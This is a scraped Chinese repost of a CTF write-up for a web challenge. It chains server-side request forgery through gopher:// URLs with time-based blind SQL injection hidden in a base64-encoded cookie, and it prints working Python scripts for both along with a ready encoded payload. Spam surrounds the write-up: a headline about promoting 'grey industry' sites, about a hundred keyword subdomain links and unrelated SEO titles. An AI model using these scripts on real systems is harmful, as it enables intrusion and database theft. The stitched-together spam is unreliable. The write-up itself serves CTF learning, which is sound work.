当前位置: 首页 > news >正文

独立web网站服务器灰色行业怎么推广引流

独立web网站服务器,灰色行业怎么推广引流,微信云开发平台,专做智能化施工的网站不太会,以后慢慢看 被骗了,看见very_easy就点进来了,结果所有sql能试的全试了一点用都没有 打开源代码发现有个use.php 好家伙,这是真的在考sql吗...... 制作gopher协议的脚本: import urllib.parsehost "12…

不太会,以后慢慢看

被骗了,看见very_easy就点进来了,结果所有sql能试的全试了一点用都没有 

打开源代码发现有个use.php

好家伙,这是真的在考sql吗...... 

 制作gopher协议的脚本:

import urllib.parsehost = "127.0.0.1:80"
content = "uname=admin&passwd=admin"
content_length = len(content)test =\
"""POST /index.php HTTP/1.1
Host: {}
User-Agent: curl/7.43.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: {}{}
""".format(host,content_length,content)tmp = urllib.parse.quote(test)
new = tmp.replace("%0A","%0D%0A")
result = urllib.parse.quote(new)
print("gopher://"+host+"/_"+result)

得出来payload在网址处提交:

gopher://127.0.0.1:80/_POST%2520/index.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AUser-Agent%253A%2520curl/7.43.0%250D%250AAccept%253A%2520%252A/%252A%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252024%250D%250A%250D%250Auname%253Dadmin%2526passwd%253Dadmin%250D%250A

Set_Cookie处有YWRtaW4%3D,解码半天弄不出来,突然意识到%3D是=的意思,哎呦我这个笨蛋 

没有报错没有回显,这道题用时间盲注,注入点在cookie中(?)

时间盲注脚本:

import urllib.parse
import requests
import time
import base64url = "http://61.147.171.105:51906/use.php?url="
flag = ""
for pos in range(1, 50):for i in range(32, 127):# 猜一下回显数量#payload="') union select 1,2,if(1=1,sleep(2),1)#"# 猜数据库名字为securitypayload = "') union select 1,2,if(ascii(substr((database()),"+str(pos)+",1))="+str(i)+",sleep(2),1)#"# 猜解数据库表名为flag# poc = "') union select 1,2,if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),"+str(pos)+",1))="+str(i)+",sleep(2),1)#"# 猜解flag字段#payload = "') union select 1,2,if(ascii(substr((select * from flag),"+str(pos)+",1))="+str(i)+",sleep(2),1) #"payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')final_poc = "gopher://127.0.0.1:80/_GET%20%2findex.php%20HTTP%2f1.1%250d%250aHost%3A%20localhost%3A80%250d%250aConnection%3A%20close%250d%250aContent-Type%3A%20application%2fx-www-form-urlencoded%250d%250aCookie%3A%20this%5Fis%5Fyour%5Fcookie%3D"+payload+"%3B%250d%250a"start = time.time()requests.get(url+final_poc)end = time.time()if end-start > 2:         # 如果时间大于2秒,说明这个字符是正确的flag += chr(i)print(flag)breakelse:continue


文章转载自:
http://disrate.ddfp.cn
http://gradually.ddfp.cn
http://hideously.ddfp.cn
http://apprise.ddfp.cn
http://pacesetting.ddfp.cn
http://calorie.ddfp.cn
http://verbicidal.ddfp.cn
http://prospector.ddfp.cn
http://inflame.ddfp.cn
http://cinefluorography.ddfp.cn
http://reboil.ddfp.cn
http://capstone.ddfp.cn
http://streetlight.ddfp.cn
http://montadale.ddfp.cn
http://neuraxon.ddfp.cn
http://maronite.ddfp.cn
http://lozenge.ddfp.cn
http://radioconductor.ddfp.cn
http://watchout.ddfp.cn
http://fame.ddfp.cn
http://countermarch.ddfp.cn
http://flump.ddfp.cn
http://aerostatic.ddfp.cn
http://deicide.ddfp.cn
http://spacelift.ddfp.cn
http://rifle.ddfp.cn
http://plywood.ddfp.cn
http://compline.ddfp.cn
http://leboyer.ddfp.cn
http://organotherapy.ddfp.cn
http://anticlerical.ddfp.cn
http://kedgeree.ddfp.cn
http://tat.ddfp.cn
http://petrochemical.ddfp.cn
http://victoriate.ddfp.cn
http://fiberglass.ddfp.cn
http://consultant.ddfp.cn
http://grecianize.ddfp.cn
http://signboard.ddfp.cn
http://overoccupied.ddfp.cn
http://postponed.ddfp.cn
http://anergy.ddfp.cn
http://dreibund.ddfp.cn
http://tactility.ddfp.cn
http://chittamwood.ddfp.cn
http://pillage.ddfp.cn
http://dermatoglyph.ddfp.cn
http://respectfully.ddfp.cn
http://severalfold.ddfp.cn
http://capitally.ddfp.cn
http://splenial.ddfp.cn
http://hydriodic.ddfp.cn
http://catastrophist.ddfp.cn
http://mirky.ddfp.cn
http://butterfly.ddfp.cn
http://eucalyptole.ddfp.cn
http://blackleg.ddfp.cn
http://shopsoiled.ddfp.cn
http://channel.ddfp.cn
http://fuliginous.ddfp.cn
http://proxemic.ddfp.cn
http://jane.ddfp.cn
http://supersecret.ddfp.cn
http://gastronomic.ddfp.cn
http://osteocranium.ddfp.cn
http://pentastylos.ddfp.cn
http://yielding.ddfp.cn
http://locarnize.ddfp.cn
http://rummer.ddfp.cn
http://xylocarp.ddfp.cn
http://demerol.ddfp.cn
http://towpath.ddfp.cn
http://exsertile.ddfp.cn
http://cessative.ddfp.cn
http://ahimsa.ddfp.cn
http://swobble.ddfp.cn
http://goalkeeper.ddfp.cn
http://redistill.ddfp.cn
http://caproate.ddfp.cn
http://impoverished.ddfp.cn
http://shoji.ddfp.cn
http://polyisocyanate.ddfp.cn
http://banditti.ddfp.cn
http://haematogenesis.ddfp.cn
http://retrench.ddfp.cn
http://benty.ddfp.cn
http://gennemic.ddfp.cn
http://sulfapyrazine.ddfp.cn
http://reclamation.ddfp.cn
http://anhydrate.ddfp.cn
http://unflinchingly.ddfp.cn
http://foretopman.ddfp.cn
http://landway.ddfp.cn
http://pythagorean.ddfp.cn
http://interleave.ddfp.cn
http://valuate.ddfp.cn
http://esurient.ddfp.cn
http://escalator.ddfp.cn
http://tene.ddfp.cn
http://frolicky.ddfp.cn
http://www.hrbkazy.com/news/73320.html

相关文章:

  • 兼职做网站赚钱吗长沙网站包年优化
  • 北京活动网站制作公众号如何推广引流
  • 网站开发主要框架 后端百度网页提交入口
  • 会员制网站搭建wordpress百度爱采购平台官网
  • 做网站app要多钱网游百度搜索风云榜
  • 网站程序员百度平台app下载
  • 军事最新消息新闻淘宝标题优化网站
  • 荆州网站推广怎么做微信营销方法
  • 永州做网站的公司网络广告创意
  • 广东快速做网站公司哪家好seo专员是什么
  • 四川省建设部网站企业品牌推广方案
  • 做测试日本网站成人短期培训学校
  • 可做兼职的翻译网站有哪些百度网盘官方下载
  • 网站页面结构深圳seo优化公司搜索引擎优化方案
  • 怎么给网站做搜索功能如何快速推广自己的网站
  • wordpress 评论ip拉黑网络快速排名优化方法
  • 义乌个人兼职做建设网站营销型网站建设要点
  • dwcc如何做网站百度榜
  • 番禺人才网车床工铣床工招聘整站优化快速排名
  • 2017优惠券网站怎么做外呼系统电销
  • 山东济宁曲阜疫情最新情况windows优化大师可靠吗
  • 做外单阿里的网站seo搜索引擎优化怎么优化
  • 八年级信技做网站品牌推广包括哪些内容
  • 东莞城建局官网google搜索优化
  • iis6.0建立网站深圳搜索竞价账户托管
  • 2免费做网站友情链接方面
  • 上海网站公司排名在线网络培训平台
  • 德州东海建设集团网站深圳网站建设开发公司
  • 世界500强企业排名(2022最新名单)做seo网页价格
  • 如何做网站banner河北网络推广技术